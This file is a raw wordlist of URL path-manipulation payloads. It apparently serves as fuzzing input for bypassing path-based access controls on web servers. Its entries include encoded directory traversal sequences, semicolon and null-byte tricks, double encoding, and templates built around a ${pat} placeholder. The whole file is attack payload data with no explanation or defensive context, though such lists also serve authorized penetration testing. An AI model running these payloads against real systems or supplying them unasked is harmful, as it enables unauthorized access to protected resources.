%23?
%09
%09%3b
%09..
%09;
%20
%23%3f
%252f%252f
%252f/
%2e%2e
%2e%2e/
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f/
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e.
%3b%2f..
%3b/%2e%2e/..%2f%2f
%3b/%2e.
%3b/%2f%2f../
%3b/..
%3b//%2f../
%3f%23
%3f%3f
..
..%00/;
..%00;/
..%09
..%0d/;
..%0d;/
..%5c/
..%ff/;
..%ff;/
..;%00/
..;%0d/
..;%ff/
..;\
..;\;
..\;
/%20%23
/%20%23
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252e/
/%252f
/%2e%2e
/%2e%2e%3b/
/%2e%2e/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2e/
/%2e//
/%2f
/%3b/
/..
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/../
/../../
/../../../
/../../..//
/../..//
/../..//../
/../..;/
/.././../
/../.;/../
/..//
/..//../
/..//../../
/..//..;/
/../;/
/../;/../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/..;/../
/..;/..;/
/..;//
/..;//../
/..;//..;/
/..;/;/
/..;/;/..;/
/.//
/.;/
/.;//
//..
//../../
//..;
//./
//.;/
///..
///../
///..//
///..;
///..;/
///..;//
//;/
/;/
/;//
/;x
/;x/
/x/../
/x/..//
/x/../;/
/x/..;/
/x/..;//
/x/..;/;/
/x//../
/x//..;/
/x/;/../
/x/;/..;/
;
;%09
;%09..
;%09..;
;%09;
;%2F..
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;%2f..
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/..%2f
;%2f..%2f/../
;%2f../%2f..%2f
;%2f../%2f../
;%2f..//..%2f
;%2f..//../
;%2f..///
;%2f..///;
;%2f..//;/
;%2f..//;/;
;%2f../;//
;%2f../;/;/
;%2f../;/;/;
;%2f..;///
;%2f..;//;/
;%2f..;/;//
;%2f/%2f../
;%2f//..%2f
;%2f//../
;%2f//..;/
;%2f/;/../
;%2f/;/..;/
;%2f;//../
;%2f;/;/..;/
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f/
;/%2e%2e/
;/%2e.
;/%2f%2f../
;/%2f/..%2f
;/%2f/../
;/.%2e
;/.%2e/%2e%2e/%2f
;/..
;/..%2f
;/..%2f%2f../
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/../
;/../%2f/
;/../../
;/../..//
;/.././../
;/../.;/../
;/..//
;/..//%2e%2e/
;/..//%2f
;/..//../
;/..///
;/../;/
;/../;/../
;/..;
;/.;.
;//%2f../
;//..
;//../../
;///..
;///../
;///..//
;x
;x/
;x;
&
%
%09
../
../%2f
.././
..%00/
..%0d/
..%5c
..\
..%ff/
%2e%2e%2f
.%2e/
%3f
%26
%23
%2e
/.
?
??
???
//
/./
.//./
//?anything
%23
/
/.randomstring
..;/
.html
%20/
.json
\..\.\
/*
./.
/*/
/..;/
%2e/${pat}
/%2e/
//.
////
/../
;${pat}/
/*/${pat}/
/*/${pat}
/${pat}/..\;/
/${pat}/;%2f..%2f..%2f
/${pat}/..%3B/
/${pat}\/\/
/${pat}/-
/${pat}/&
/${pat}/°/
/${pat}/~
/${pat}~
/${pat}?id=1
/${pat}.html
/${pat}.css
/${pat}%00
/${pat};/
/${pat}..;/
/${pat}/.json
/${pat}.json
/${pat}/..;/
/%20/${pat}/%20/
/%20/${pat}/%20
/%2e/${pat}/
/%2e/${pat}
/${pat}/./
//;//${pat}/
//;//${pat}
/;/${pat}/
/;/${pat}
/.;/${pat}/
/.;/${pat}
/..;/${pat}/
/..;/${pat}
/./${pat}/
/./${pat}
/${pat}/%23/./
/${pat}/%23/
/${pat}/%23
/${pat}/%26/
/${pat}/%3f/
/${pat}/%3f
/${pat}/%26
/${pat}/%23/
/${pat}/%23
/${pat}/%25/
/${pat}/%25
/${pat}/%0d/
/${pat}/%0d
/${pat}/%0a/
/${pat}/%0a
/${pat}/%09/
/${pat}/%09
/${pat}/%20/
/${pat}/%20
/${pat}/%2f/
/${pat}/%2f
/${pat}//*
/${pat}/*
/${pat}/.//
/${pat}/.
/${pat}/./
/${pat}/../
/${pat}/..
/${pat}/??/
/${pat}/??
/${pat}/?/
/${pat}??
/${pat}??
/${pat}?
/./${pat}/./
///${pat}///
//${pat}//
/${pat}/?
